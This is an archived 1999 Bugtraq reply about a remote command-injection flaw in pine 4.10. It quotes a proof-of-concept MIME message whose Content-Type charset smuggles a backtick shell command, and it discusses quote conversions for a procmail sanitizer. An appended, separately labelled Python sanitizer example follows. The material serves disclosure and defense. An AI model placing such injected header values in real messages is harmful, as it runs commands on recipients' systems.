Bugtraq mailing list archives
Re: remote exploit on pine 4.10 - neverending story?
From: jhardin () WOLFENET COM (John D. Hardin)
Date: Mon, 8 Feb 1999 09:25:11 -0800
On Mon, 8 Feb 1999, Michal Zalewski wrote:
Hmm, but take a look at this message:

************************** MIME MESSAGE FOLLOWS **************************
From: Attacker <attacker () eleet net>
To: Victim <victim () somewhere net>
Subject: Happy birthday ...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'

Make a wish...

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"

...it could be your last.

*************************** MIME MESSAGE ENDS ***************************
Okay, I have added `` -> " conversion to my procmail MIME sanitizer. Michal, is that the only way to exploit this? Or should there be ` -> ' conversion as well?

See http://www.wolfenet.com/~jhardin/procmail-security.html for details.

--
John Hardin KA7OHZ jhardin () wolfenet com
pgpk -a finger://gonzo.wolfenet.com/jhardin
PGP key ID: 0x41EA94F5
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
Your mouse has moved. Windows NT must be restarted for the change to take effect. Reboot now? [ OK ]
-----------------------------------------------------------------------
101 days until Star Wars episode I
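
An added example (not code from the post or from the procmail sanitizer it mentions) that applies both conversions raised above, `` -> " and ` -> ', to the Content-* headers of every MIME part, including folded continuation lines, while leaving part bodies untouched. The sample message, its placeholder value, and the names sanitize_header_value and sanitize_message are constructed for illustration.

```python
import re

# Constructed sample message (placeholder command name, not taken from the post).
SAMPLE = "\n".join([
    "From: a@example.net",
    'Content-Type: MULTIPART/MIXED; BOUNDARY="b1"',
    "",
    "--b1",
    "Content-Type: TEXT/PLAIN; charset=``cmd``;",
    ' name="x.c"',
    "",
    "body `text` stays as written",
    "--b1",
    "Content-Type: TEXT/PLAIN; charset=`cmd`",
    "",
    "second part",
    "--b1--",
])

CONTENT_HDR = re.compile(r"^Content-[A-Za-z-]+:", re.I)
BOUNDARY = re.compile(r'boundary="?([^";\s]+)"?', re.I)

def sanitize_header_value(text):
    """Apply `` -> " first, then ` -> ' (this order turns a doubled pair into one quote)."""
    return text.replace("``", '"').replace("`", "'")

def sanitize_message(raw):
    """Return (cleaned message, list of original header lines that were changed)."""
    out, changed, delimiters = [], [], set()
    in_headers, in_content = True, False
    for line in raw.split("\n"):
        if in_headers:
            if line == "":
                in_headers = in_content = False      # blank line ends a header block
            elif line[0] not in " \t":               # folded lines keep previous state
                in_content = bool(CONTENT_HDR.match(line))
            if in_content:
                m = BOUNDARY.search(line)
                if m:
                    delimiters.add("--" + m.group(1))
                clean = sanitize_header_value(line)
                if clean != line:
                    changed.append(line)
                    line = clean
        elif line.rstrip() in delimiters:            # a new part's headers follow
            in_headers = True
        out.append(line)
    return "\n".join(out), changed
```

The returned list of changed header lines can be logged so that rewritten messages are visible to whoever operates the mail filter.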